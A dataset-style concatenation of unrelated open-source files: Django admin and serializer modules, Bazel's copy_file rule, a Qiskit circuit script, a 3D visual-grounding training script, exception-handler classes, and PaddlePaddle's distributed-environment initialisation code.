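#     reread = Image.open("/tmp/example.im")   # handled by ImImageFile._open()
#     assert reread.mode == "RGB" and reread.size == (32, 32)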
|
the-stack_0_12426 | from django.contrib import admin
# from django.contrib.admin import ModelAdmin
from leaflet.admin import LeafletGeoAdmin
from .models import (
RainfallEvent,
Pixel,
Gauge
)
# customize admin site info
admin.site.site_header = '3RWW API'
admin.site.site_title = '3RWW API'
admin.site.index_title = '3RWW API'
class RainfallEventAdmin(admin.ModelAdmin):
list_filter = ('start_dt', 'end_dt')
search_fields = ['start_dt', 'end_dt', 'report_label', 'event_label']
for i in [
[RainfallEvent, RainfallEventAdmin],
[Pixel, LeafletGeoAdmin],
[Gauge, LeafletGeoAdmin]
]:
admin.site.register(*i) |
the-stack_0_12427 | # Copyright 2019 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# LOCAL MODIFICATIONS:
# this has two PRs patched in:
# https://github.com/bazelbuild/bazel-skylib/pull/323
# https://github.com/bazelbuild/bazel-skylib/pull/324
"""Implementation of copy_file macro and underlying rules.
These rules copy a file or directory to another location using Bash (on Linux/macOS) or
cmd.exe (on Windows). `_copy_xfile` marks the resulting file executable,
`_copy_file` does not.
"""
# Hints for Bazel spawn strategy
_execution_requirements = {
# Copying files is entirely IO-bound and there is no point doing this work remotely.
# Also, remote-execution does not allow source directory inputs, see
# https://github.com/bazelbuild/bazel/commit/c64421bc35214f0414e4f4226cc953e8c55fa0d2
# So we must not attempt to execute remotely in that case.
"no-remote-exec": "1",
}
def _hash_file(file):
return str(hash(file.path))
# buildifier: disable=function-docstring
def copy_cmd(ctx, src, dst):
# Most Windows binaries built with MSVC use a certain argument quoting
# scheme. Bazel uses that scheme too to quote arguments. However,
# cmd.exe uses different semantics, so Bazel's quoting is wrong here.
# To fix that we write the command to a .bat file so no command line
# quoting or escaping is required.
# Put a hash of the file name into the name of the generated batch file to
# make it unique within the package, so that users can define multiple copy_file's.
bat = ctx.actions.declare_file("%s-%s-cmd.bat" % (ctx.label.name, _hash_file(src)))
# Flags are documented at
# https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/copy
# https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/robocopy
# NB: robocopy return non-zero exit codes on success so we must exit 0 after calling it
if dst.is_directory:
cmd_tmpl = "@robocopy \"{src}\" \"{dst}\" /E >NUL & @exit 0"
mnemonic = "CopyDirectory"
progress_message = "Copying directory %s" % src.path
else:
cmd_tmpl = "@copy /Y \"{src}\" \"{dst}\" >NUL"
mnemonic = "CopyFile"
progress_message = "Copying file %s" % src.path
ctx.actions.write(
output = bat,
# Do not use lib/shell.bzl's shell.quote() method, because that uses
# Bash quoting syntax, which is different from cmd.exe's syntax.
content = cmd_tmpl.format(
src = src.path.replace("/", "\\"),
dst = dst.path.replace("/", "\\"),
),
is_executable = True,
)
ctx.actions.run(
inputs = [src],
tools = [bat],
outputs = [dst],
executable = "cmd.exe",
arguments = ["/C", bat.path.replace("/", "\\")],
mnemonic = mnemonic,
progress_message = progress_message,
use_default_shell_env = True,
execution_requirements = _execution_requirements,
)
# buildifier: disable=function-docstring
def copy_bash(ctx, src, dst):
if dst.is_directory:
cmd_tmpl = "rm -rf \"$2\" && cp -rf \"$1/\" \"$2\""
mnemonic = "CopyDirectory"
progress_message = "Copying directory %s" % src.path
else:
cmd_tmpl = "cp -f \"$1\" \"$2\""
mnemonic = "CopyFile"
progress_message = "Copying file %s" % src.path
ctx.actions.run_shell(
tools = [src],
outputs = [dst],
command = cmd_tmpl,
arguments = [src.path, dst.path],
mnemonic = mnemonic,
progress_message = progress_message,
use_default_shell_env = True,
execution_requirements = _execution_requirements,
)
def _copy_file_impl(ctx):
# When creating a directory, declare that to Bazel so downstream rules
# see it as a TreeArtifact and handle correctly, e.g. for remote execution
if getattr(ctx.attr, "is_directory", False):
output = ctx.actions.declare_directory(ctx.attr.out)
else:
output = ctx.outputs.out
if ctx.attr.allow_symlink:
if output.is_directory:
fail("Cannot use both is_directory and allow_symlink")
ctx.actions.symlink(
output = output,
target_file = ctx.file.src,
is_executable = ctx.attr.is_executable,
)
elif ctx.attr.is_windows:
copy_cmd(ctx, ctx.file.src, output)
else:
copy_bash(ctx, ctx.file.src, output)
files = depset(direct = [output])
runfiles = ctx.runfiles(files = [output])
if ctx.attr.is_executable:
return [DefaultInfo(files = files, runfiles = runfiles, executable = output)]
else:
return [DefaultInfo(files = files, runfiles = runfiles)]
_ATTRS = {
"src": attr.label(mandatory = True, allow_single_file = True),
"is_windows": attr.bool(mandatory = True),
"is_executable": attr.bool(mandatory = True),
"allow_symlink": attr.bool(mandatory = True),
}
_copy_directory = rule(
implementation = _copy_file_impl,
provides = [DefaultInfo],
attrs = dict(_ATTRS, **{
"is_directory": attr.bool(default = True),
# Cannot declare out as an output here, because there's no API for declaring
# TreeArtifact outputs.
"out": attr.string(mandatory = True),
}),
)
_copy_file = rule(
implementation = _copy_file_impl,
provides = [DefaultInfo],
attrs = dict(_ATTRS, **{
"out": attr.output(mandatory = True),
}),
)
_copy_xfile = rule(
implementation = _copy_file_impl,
executable = True,
provides = [DefaultInfo],
attrs = dict(_ATTRS, **{
"out": attr.output(mandatory = True),
}),
)
def copy_file(name, src, out, is_directory = False, is_executable = False, allow_symlink = False, **kwargs):
"""Copies a file or directory to another location.
`native.genrule()` is sometimes used to copy files (often wishing to rename them). The 'copy_file' rule does this with a simpler interface than genrule.
This rule uses a Bash command on Linux/macOS/non-Windows, and a cmd.exe command on Windows (no Bash is required).
If using this rule with source directories, it is recommended that you use the
`--host_jvm_args=-DBAZEL_TRACK_SOURCE_DIRECTORIES=1` startup option so that changes
to files within source directories are detected. See
https://github.com/bazelbuild/bazel/commit/c64421bc35214f0414e4f4226cc953e8c55fa0d2
for more context.
Args:
name: Name of the rule.
src: A Label. The file or directory to make a copy of.
(Can also be the label of a rule that generates a file or directory.)
out: Path of the output file, relative to this package.
is_directory: treat the source file as a directory
Workaround for https://github.com/bazelbuild/bazel/issues/12954
is_executable: A boolean. Whether to make the output file executable. When
True, the rule's output can be executed using `bazel run` and can be
in the srcs of binary and test rules that require executable sources.
WARNING: If `allow_symlink` is True, `src` must also be executable.
allow_symlink: A boolean. Whether to allow symlinking instead of copying.
When False, the output is always a hard copy. When True, the output
*can* be a symlink, but there is no guarantee that a symlink is
created (i.e., at the time of writing, we don't create symlinks on
Windows). Set this to True if you need fast copying and your tools can
handle symlinks (which most UNIX tools can).
**kwargs: further keyword arguments, e.g. `visibility`
"""
copy_file_impl = _copy_file
if is_executable:
copy_file_impl = _copy_xfile
elif is_directory:
copy_file_impl = _copy_directory
copy_file_impl(
name = name,
src = src,
out = out,
is_windows = select({
"@bazel_tools//src/conditions:host_windows": True,
"//conditions:default": False,
}),
is_executable = is_executable,
allow_symlink = allow_symlink,
**kwargs
)
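# Usage sketch (illustrative): a BUILD.bazel snippet using the macro above. The
# load label below is an assumption and depends on where this file is vendored.
#
#     load("//third_party/skylib:copy_file.bzl", "copy_file")
#
#     copy_file(
#         name = "copy_license",
#         src = "//:LICENSE",
#         out = "LICENSE.copied",
#     )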
|
the-stack_0_12428 | # qubit number=4
# total number=43
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
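# Examples (computed from the definitions above):
#   bitwise_xor("101", "011") -> "011"  (per-bit XOR gives "110", then reversed)
#   bitwise_dot("101", "011") -> "1"    (inner product mod 2: 1*0 + 0*1 + 1*1 = 1)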
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.cx(input_qubit[0],input_qubit[3]) # number=13
prog.h(input_qubit[3]) # number=23
prog.cz(input_qubit[0],input_qubit[3]) # number=24
prog.y(input_qubit[1]) # number=37
prog.h(input_qubit[3]) # number=25
prog.x(input_qubit[3]) # number=18
prog.cx(input_qubit[0],input_qubit[3]) # number=19
prog.cx(input_qubit[0],input_qubit[3]) # number=15
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.y(input_qubit[3]) # number=12
prog.h(input_qubit[0]) # number=5
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1]) # number=6
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=32
prog.h(input_qubit[0]) # number=40
prog.cz(input_qubit[3],input_qubit[0]) # number=41
prog.h(input_qubit[0]) # number=42
prog.cx(input_qubit[3],input_qubit[0]) # number=26
prog.z(input_qubit[3]) # number=27
prog.h(input_qubit[0]) # number=29
prog.cz(input_qubit[3],input_qubit[0]) # number=30
prog.h(input_qubit[0]) # number=31
prog.h(input_qubit[0]) # number=33
prog.cz(input_qubit[3],input_qubit[0]) # number=34
prog.h(input_qubit[0]) # number=35
prog.h(input_qubit[2]) # number=36
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=9
prog.y(input_qubit[2]) # number=10
prog.y(input_qubit[2]) # number=11
prog.y(input_qubit[2]) # number=38
prog.y(input_qubit[2]) # number=39
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
backend = BasicAer.get_backend('qasm_simulator')
sample_shot =8000
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit3069.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
|
the-stack_0_12429 | from django.contrib.auth.models import User
from rest_framework import serializers
from lists.models import Todo, TodoList
class UserSerializer(serializers.ModelSerializer):
todolists = serializers.PrimaryKeyRelatedField(
many=True, queryset=TodoList.objects.all()
)
class Meta:
model = User
fields = ("id", "username", "last_login", "date_joined", "todolists")
class TodoListSerializer(serializers.ModelSerializer):
creator = serializers.ReadOnlyField(source="creator.username")
class Meta:
model = TodoList
fields = ("id", "title", "created_at", "creator", "todos")
class TodoSerializer(serializers.ModelSerializer):
creator = serializers.ReadOnlyField(source="creator.username")
class Meta:
model = Todo
fields = (
"id",
"todolist",
"description",
"created_at",
"creator",
"is_finished",
"finished_at",
)
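# Hedged usage sketch (not part of the original module): with Django configured
# and the lists app installed, a view or shell session could serialize the open
# todos like this. The helper name and the filter are illustrative assumptions.
def _example_serialize_open_todos():
    open_todos = Todo.objects.filter(is_finished=False)
    serializer = TodoSerializer(open_todos, many=True)
    return serializer.data  # list of dicts matching the declared fields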
|
the-stack_0_12430 | # ------------------------------------------------------------------------
# BEAUTY DETR
# Copyright (c) 2022 Ayush Jain & Nikolaos Gkanatsios
# Licensed under CC-BY-NC [see LICENSE for details]
# All Rights Reserved
# ------------------------------------------------------------------------
# Parts adapted from Group-Free
# Copyright (c) 2021 Ze Liu. All Rights Reserved.
# Licensed under the MIT License.
# ------------------------------------------------------------------------
"""Main script for language modulation."""
import os
import numpy as np
import torch
import torch.distributed as dist
from main_utils import parse_option, BaseTrainTester
from data.model_util_scannet import ScannetDatasetConfig
from src.joint_det_dataset import Joint3DDataset
from src.grounding_evaluator import GroundingEvaluator
from models import BeaUTyDETR
from models import APCalculator, parse_predictions, parse_groundtruths
import ipdb
st = ipdb.set_trace
class TrainTester(BaseTrainTester):
"""Train/test a language grounder."""
def __init__(self, args):
"""Initialize."""
super().__init__(args)
@staticmethod
def get_datasets(args):
"""Initialize datasets."""
dataset_dict = {} # dict to use multiple datasets
for dset in args.dataset:
dataset_dict[dset] = 1
if args.joint_det:
dataset_dict['scannet'] = 10
print('Loading datasets:', sorted(list(dataset_dict.keys())))
train_dataset = Joint3DDataset(
dataset_dict=dataset_dict,
test_dataset=args.test_dataset,
split='train' if not args.debug else 'val',
use_color=args.use_color, use_height=args.use_height,
overfit=args.debug,
data_path=args.data_root,
detect_intermediate=args.detect_intermediate,
use_multiview=args.use_multiview,
butd=args.butd,
butd_gt=args.butd_gt,
butd_cls=args.butd_cls,
augment_det=args.augment_det
)
test_dataset = Joint3DDataset(
dataset_dict=dataset_dict,
test_dataset=args.test_dataset,
split='val' if not args.eval_train else 'train',
use_color=args.use_color, use_height=args.use_height,
overfit=args.debug,
data_path=args.data_root,
detect_intermediate=args.detect_intermediate,
use_multiview=args.use_multiview,
butd=args.butd,
butd_gt=args.butd_gt,
butd_cls=args.butd_cls
)
return train_dataset, test_dataset
@staticmethod
def get_model(args):
"""Initialize the model."""
num_input_channel = int(args.use_color) * 3
if args.use_height:
num_input_channel += 1
if args.use_multiview:
num_input_channel += 128
if args.use_soft_token_loss:
num_class = 256
else:
num_class = 19
model = BeaUTyDETR(
num_class=num_class,
num_obj_class=485,
input_feature_dim=num_input_channel,
num_queries=args.num_target,
num_decoder_layers=args.num_decoder_layers,
self_position_embedding=args.self_position_embedding,
contrastive_align_loss=args.use_contrastive_align,
butd=args.butd or args.butd_gt or args.butd_cls,
pointnet_ckpt=args.pp_checkpoint,
self_attend=args.self_attend
)
return model
@staticmethod
def _get_inputs(batch_data):
return {
'point_clouds': batch_data['point_clouds'].float(),
'text': batch_data['utterances'],
"det_boxes": batch_data['all_detected_boxes'],
"det_bbox_label_mask": batch_data['all_detected_bbox_label_mask'],
"det_class_ids": batch_data['all_detected_class_ids']
}
@torch.no_grad()
def evaluate_one_epoch(self, epoch, test_loader,
model, criterion, set_criterion, args):
"""
Eval grounding after a single epoch.
Some of the args:
model: a nn.Module that returns end_points (dict)
criterion: a function that returns (loss, end_points)
"""
if args.test_dataset == 'scannet':
return self.evaluate_one_epoch_det(
epoch, test_loader, model,
criterion, set_criterion, args
)
stat_dict = {}
model.eval() # set model to eval mode (for bn and dp)
if args.num_decoder_layers > 0:
prefixes = ['last_', 'proposal_']
prefixes = ['last_']
prefixes.append('proposal_')
else:
prefixes = ['proposal_'] # only proposal
prefixes += [f'{i}head_' for i in range(args.num_decoder_layers - 1)]
evaluator = GroundingEvaluator(
only_root=True, thresholds=[0.25, 0.5],
topks=[1, 5, 10], prefixes=prefixes,
filter_non_gt_boxes=args.butd_cls
)
# Main eval branch
for batch_idx, batch_data in enumerate(test_loader):
stat_dict, end_points = self._main_eval_branch(
batch_idx, batch_data, test_loader, model, stat_dict,
criterion, set_criterion, args
)
if evaluator is not None:
for prefix in prefixes:
evaluator.evaluate(end_points, prefix)
evaluator.synchronize_between_processes()
if dist.get_rank() == 0:
if evaluator is not None:
evaluator.print_stats()
return None
@torch.no_grad()
def evaluate_one_epoch_det(self, epoch, test_loader,
model, criterion, set_criterion, args):
"""
Eval grounding after a single epoch.
Some of the args:
model: a nn.Module that returns end_points (dict)
criterion: a function that returns (loss, end_points)
"""
dataset_config = ScannetDatasetConfig(18)
# Used for AP calculation
CONFIG_DICT = {
'remove_empty_box': False, 'use_3d_nms': True,
'nms_iou': 0.25, 'use_old_type_nms': False, 'cls_nms': True,
'per_class_proposal': True, 'conf_thresh': 0.0,
'dataset_config': dataset_config,
'hungarian_loss': True
}
stat_dict = {}
model.eval() # set model to eval mode (for bn and dp)
if set_criterion is not None:
set_criterion.eval()
if args.num_decoder_layers > 0:
prefixes = ['last_', 'proposal_']
prefixes += [
f'{i}head_' for i in range(args.num_decoder_layers - 1)
]
else:
prefixes = ['proposal_'] # only proposal
prefixes = ['last_']
ap_calculator_list = [
APCalculator(iou_thresh, dataset_config.class2type)
for iou_thresh in args.ap_iou_thresholds
]
mAPs = [
[iou_thresh, {k: 0 for k in prefixes}]
for iou_thresh in args.ap_iou_thresholds
]
batch_pred_map_cls_dict = {k: [] for k in prefixes}
batch_gt_map_cls_dict = {k: [] for k in prefixes}
# Main eval branch
wordidx = np.array([
0, 0, 0, 1, 2, 3, 4, 5, 6, 7, 7, 7, 8, 9, 10, 11,
12, 13, 13, 14, 15, 16, 16, 17, 17, 18, 18
])
tokenidx = np.array([
1, 2, 3, 5, 7, 9, 11, 13, 15, 17, 18, 19, 21, 23,
25, 27, 29, 31, 32, 34, 36, 38, 39, 41, 42, 44, 45
])
for batch_idx, batch_data in enumerate(test_loader):
stat_dict, end_points = self._main_eval_branch(
batch_idx, batch_data, test_loader, model, stat_dict,
criterion, set_criterion, args
)
# contrast
proj_tokens = end_points['proj_tokens'] # (B, tokens, 64)
proj_queries = end_points['last_proj_queries'] # (B, Q, 64)
sem_scores = torch.matmul(proj_queries, proj_tokens.transpose(-1, -2))
sem_scores_ = sem_scores / 0.07 # (B, Q, tokens)
sem_scores = torch.zeros(sem_scores_.size(0), sem_scores_.size(1), 256)
sem_scores = sem_scores.to(sem_scores_.device)
sem_scores[:, :sem_scores_.size(1), :sem_scores_.size(2)] = sem_scores_
end_points['last_sem_cls_scores'] = sem_scores
# end contrast
sem_cls = torch.zeros_like(end_points['last_sem_cls_scores'])[..., :19]
for w, t in zip(wordidx, tokenidx):
sem_cls[..., w] += end_points['last_sem_cls_scores'][..., t]
end_points['last_sem_cls_scores'] = sem_cls
# Parse predictions
# for prefix in prefixes:
prefix = 'last_'
batch_pred_map_cls = parse_predictions(
end_points, CONFIG_DICT, prefix,
size_cls_agnostic=True)
batch_gt_map_cls = parse_groundtruths(
end_points, CONFIG_DICT,
size_cls_agnostic=True)
batch_pred_map_cls_dict[prefix].append(batch_pred_map_cls)
batch_gt_map_cls_dict[prefix].append(batch_gt_map_cls)
mAP = 0.0
# for prefix in prefixes:
prefix = 'last_'
for (batch_pred_map_cls, batch_gt_map_cls) in zip(
batch_pred_map_cls_dict[prefix],
batch_gt_map_cls_dict[prefix]):
for ap_calculator in ap_calculator_list:
ap_calculator.step(batch_pred_map_cls, batch_gt_map_cls)
# Evaluate average precision
for i, ap_calculator in enumerate(ap_calculator_list):
metrics_dict = ap_calculator.compute_metrics()
self.logger.info(
'=====================>'
f'{prefix} IOU THRESH: {args.ap_iou_thresholds[i]}'
'<====================='
)
for key in metrics_dict:
self.logger.info(f'{key} {metrics_dict[key]}')
if prefix == 'last_' and ap_calculator.ap_iou_thresh > 0.3:
mAP = metrics_dict['mAP']
mAPs[i][1][prefix] = metrics_dict['mAP']
ap_calculator.reset()
for mAP in mAPs:
self.logger.info(
f'IoU[{mAP[0]}]:\t'
+ ''.join([
f'{key}: {mAP[1][key]:.4f} \t'
for key in sorted(mAP[1].keys())
])
)
return None
if __name__ == '__main__':
os.environ["TOKENIZERS_PARALLELISM"] = "false"
opt = parse_option()
torch.cuda.set_device(opt.local_rank)
torch.distributed.init_process_group(backend='nccl', init_method='env://')
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
torch.backends.cudnn.deterministic = True
train_tester = TrainTester(opt)
ckpt_path = train_tester.main(opt)
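# Hedged launch sketch (not part of the original script): init_process_group with
# the 'env://' method expects the usual torch.distributed environment variables,
# so a typical run goes through the launcher. Script name, flag names and paths
# below are illustrative assumptions, not verified defaults.
#
#   python -m torch.distributed.launch --nproc_per_node=2 train_dist_mod.py \
#       --dataset sr3d --test_dataset sr3d --data_root ./datasets/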
|
the-stack_0_12435 | import abc
from typing import Dict
from typing import Optional
from typing import Tuple
from typing import Type
from typing import Union
from winter.core import ComponentMethod
from .throws import get_throws
NotHandled = object()
class ExceptionHandler(abc.ABC):
@abc.abstractmethod
def handle(self, exception: Exception, **kwargs): # pragma: no cover
pass
class ExceptionHandlersRegistry:
HandlersMap = Dict[Type[Exception], ExceptionHandler]
def __init__(self):
self._handlers: ExceptionHandlersRegistry.HandlersMap = {}
self._auto_handle_exceptions = set()
super().__init__()
@property
def auto_handle_exception_classes(self) -> Tuple[Type[Exception], ...]:
return tuple(self._auto_handle_exceptions)
def add_handler(
self,
exception_cls: Type[Exception],
handler_cls: Type[ExceptionHandler],
*,
auto_handle: bool = False,
):
assert exception_cls not in self._handlers
self._handlers[exception_cls] = handler_cls()
if auto_handle:
self._auto_handle_exceptions.add(exception_cls)
def get_handler(
self,
exception: Union[Type[Exception], Exception],
) -> Optional[ExceptionHandler]:
exception_type = type(exception) if isinstance(exception, Exception) else exception
for exception_cls, handler in self._handlers.items():
if issubclass(exception_type, exception_cls):
return handler
return None
class MethodExceptionsManager:
def __init__(self, method: ComponentMethod):
super().__init__()
self._method = method
self._handlers_by_exception = get_throws(self._method)
@property
def declared_exception_classes(self) -> Tuple[Type[Exception], ...]:
return tuple(self._handlers_by_exception.keys())
@property
def exception_classes(self) -> Tuple[Type[Exception], ...]:
return self.declared_exception_classes + exception_handlers_registry.auto_handle_exception_classes
def get_handler(self, exception: Union[Type[Exception], Exception]) -> Optional[ExceptionHandler]:
exception_type = type(exception) if isinstance(exception, Exception) else exception
for exception_cls, handler in self._handlers_by_exception.items():
if handler is not None and issubclass(exception_type, exception_cls):
return handler
return exception_handlers_registry.get_handler(exception)
exception_handlers_registry = ExceptionHandlersRegistry()
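# Hedged usage sketch (not part of the original module): how a project might plug
# a domain exception into the registry. The exception class, handler body and the
# dict-shaped response are illustrative assumptions, not winter framework API.
class _DuplicateEntryException(Exception):
    pass
class _DuplicateEntryHandler(ExceptionHandler):
    def handle(self, exception: Exception, **kwargs):
        # Map the domain error onto whatever response object the web layer expects;
        # a plain dict stands in for that here.
        return {'status': 409, 'detail': str(exception)}
# Registering it (kept commented out so importing this sketch has no side effects):
# exception_handlers_registry.add_handler(_DuplicateEntryException, _DuplicateEntryHandler)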
|
the-stack_0_12437 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import warnings
from multiprocessing import Process # noqa: F401
from multiprocessing import Manager # noqa: F401
import time
import sys
from paddle import compat as cpt
# deprecated module import
from paddle.fluid import core
from paddle.fluid.framework import _set_expected_place
from paddle.fluid.dygraph import parallel_helper
from paddle.fluid.dygraph.parallel import ParallelEnv
from paddle.distributed.fleet.base.private_helper_function import wait_server_ready # noqa: F401
__all__ = []
ParallelStrategy = core.ParallelStrategy
# NOTE(chenweihang): Maintain a global parallel env to avoid
# initializing ParallelEnv every time and improve performance
_global_parallel_env = None
def _get_global_parallel_env():
global _global_parallel_env
if _global_parallel_env is None:
_global_parallel_env = ParallelEnv()
return _global_parallel_env
def _start_kv_server(port, http_server_d, size):
from paddle.distributed.fleet.utils.http_server import KVServer
http_server = KVServer(int(port), size=size)
http_server.start()
wait_seconds = 3
while http_server_d.get("running", False) or not http_server.should_stop():
time.sleep(wait_seconds)
http_server.stop()
def init_parallel_env():
"""
Initialize parallel training environment in dynamic graph mode.
.. note::
Now initialize both `NCCL` and `GLOO` contexts for communication.
Returns:
None
Examples:
.. code-block:: python
import paddle
import paddle.nn as nn
import paddle.optimizer as opt
import paddle.distributed as dist
class LinearNet(nn.Layer):
def __init__(self):
super(LinearNet, self).__init__()
self._linear1 = nn.Linear(10, 10)
self._linear2 = nn.Linear(10, 1)
def forward(self, x):
return self._linear2(self._linear1(x))
def train():
# 1. initialize parallel environment
dist.init_parallel_env()
# 2. create data parallel layer & optimizer
layer = LinearNet()
dp_layer = paddle.DataParallel(layer)
loss_fn = nn.MSELoss()
adam = opt.Adam(
learning_rate=0.001, parameters=dp_layer.parameters())
# 3. run layer
inputs = paddle.randn([10, 10], 'float32')
outputs = dp_layer(inputs)
labels = paddle.randn([10, 1], 'float32')
loss = loss_fn(outputs, labels)
loss.backward()
adam.step()
adam.clear_grad()
if __name__ == '__main__':
dist.spawn(train)
"""
# 0. get env & check world size
global _global_parallel_env
# when call init_parallel_env, need update `_global_parallel_env`
_global_parallel_env = ParallelEnv()
parallel_env = _global_parallel_env
# if not parallel, `init_parallel_env` do nothing
if parallel_env.world_size < 2:
warnings.warn(
"Currently not a parallel execution environment, `paddle.distributed.init_parallel_env` will not do anything."
)
return
# 1. gpu xpu check, must be gpu or xpu
if not core.is_compiled_with_cuda() and not core.is_compiled_with_xpu():
raise NotImplementedError(
"Cannot initialize parallel environment in CPU-only version, now only "
"supports initializing the GPU and XPU parallel environment. Please recompile "
"or reinstall paddle with GPU or XPU support.")
# 2. check env
def _check_var_exists(var_name):
var = os.environ.get(var_name, None)
if var is None:
raise ValueError("paddle.distributed initialize error, "
"environment variable %s is needed, but not set." %
var_name)
if core.is_compiled_with_cuda():
_check_var_exists("FLAGS_selected_gpus")
elif core.is_compiled_with_xpu():
_check_var_exists('FLAGS_selected_xpus')
_check_var_exists("PADDLE_TRAINER_ID")
_check_var_exists("PADDLE_CURRENT_ENDPOINT")
_check_var_exists("PADDLE_TRAINERS_NUM")
_check_var_exists("PADDLE_TRAINER_ENDPOINTS")
# 3: init gloo context (step 1: httpsever start)
init_gloo = int(os.getenv("PADDLE_WITH_GLOO", "0"))
if init_gloo:
ep_rank_0 = parallel_env.trainer_endpoints[0].split(":")
manager = Manager()
        # global dict to store status
http_server_d = manager.dict()
http_server_d["running"] = False
if parallel_env.rank == 0:
# The scope for worker used by http server is '_worker'
size = {'_worker': parallel_env.world_size}
http_server = Process(
target=_start_kv_server,
args=(int(ep_rank_0[1]), http_server_d, size))
http_server.daemon = True
http_server_d["running"] = True
http_server.start()
# 4. init NCCL ParallelStrategy
strategy = ParallelStrategy()
if parallel_helper._is_parallel_ctx_initialized():
warnings.warn("The parallel environment has been initialized.")
strategy.nranks = parallel_env.world_size
strategy.local_rank = parallel_env.rank
strategy.trainer_endpoints = parallel_env.trainer_endpoints
strategy.current_endpoint = parallel_env.current_endpoint
strategy.nrings = parallel_env.nrings
# NOTE(chenweihang): [ why config global place here? ]
# the dygraph mode will be set to default mode,
# users will not call `dygraph.guard` or `enable_dygraph`
# directly, if they want to switch default place,
# they need to call a function to change default place,
# here just set correctly place to users
if core.is_compiled_with_cuda():
place = core.CUDAPlace(parallel_env.device_id)
elif core.is_compiled_with_xpu():
place = core.XPUPlace(parallel_env.device_id)
_set_expected_place(place)
# init nccl or bkcl context
if core.is_compiled_with_cuda():
parallel_helper._set_parallel_ctx(
core.NCCLParallelContext(strategy, place))
elif core.is_compiled_with_xpu():
parallel_helper._set_parallel_ctx(
core.BKCLParallelContext(strategy, place))
other_endpoints = strategy.trainer_endpoints[:]
other_endpoints.remove(strategy.current_endpoint)
if strategy.local_rank == 0:
wait_server_ready(other_endpoints)
parallel_helper._init_parallel_ctx()
# 5: init gloo context (step 2: gloo init)
    # dividing init_gloo into two parts because nccl and gloo
    # look for free ports separately, which sometimes
    # leads to port conflicts.
if init_gloo:
wait_server_ready([parallel_env.trainer_endpoints[0]])
gloo_strategy = core.GlooParallelStrategy()
gloo_strategy.rank = parallel_env.rank
gloo_strategy.rank_num = parallel_env.world_size
gloo_strategy.ip_address = ep_rank_0[0]
gloo_strategy.ip_port = int(ep_rank_0[1])
default_init_timeout_seconds = 3600
default_run_timeout_seconds = 9999999
gloo_strategy.init_seconds = default_init_timeout_seconds
gloo_strategy.run_seconds = default_run_timeout_seconds
gloo = core.GlooParallelContext(gloo_strategy)
gloo.init()
if parallel_env.rank == 0:
http_server_d["running"] = False
http_server.join()
def get_rank():
"""
Returns the rank of current trainer.
Its value is equal to the value of the environment variable ``PADDLE_TRAINER_ID`` .
The default value is 0.
Returns:
(int) The rank of current trainer.
Examples:
.. code-block:: python
import paddle
import paddle.distributed as dist
# execute this command in terminal: export PADDLE_TRAINER_ID=0
print("The rank is %d" % dist.get_rank())
# The rank is 0
"""
return _get_global_parallel_env().rank
def get_world_size():
"""
Returns the number of trainers (number of processes participating in current job).
Its value is equal to the value of the environment variable ``PADDLE_TRAINERS_NUM`` .
The default value is 1.
Returns:
(int) The number of trainers.
Examples:
.. code-block:: python
import paddle
import paddle.distributed as dist
# execute this command in terminal: export PADDLE_TRAINERS_NUM=4
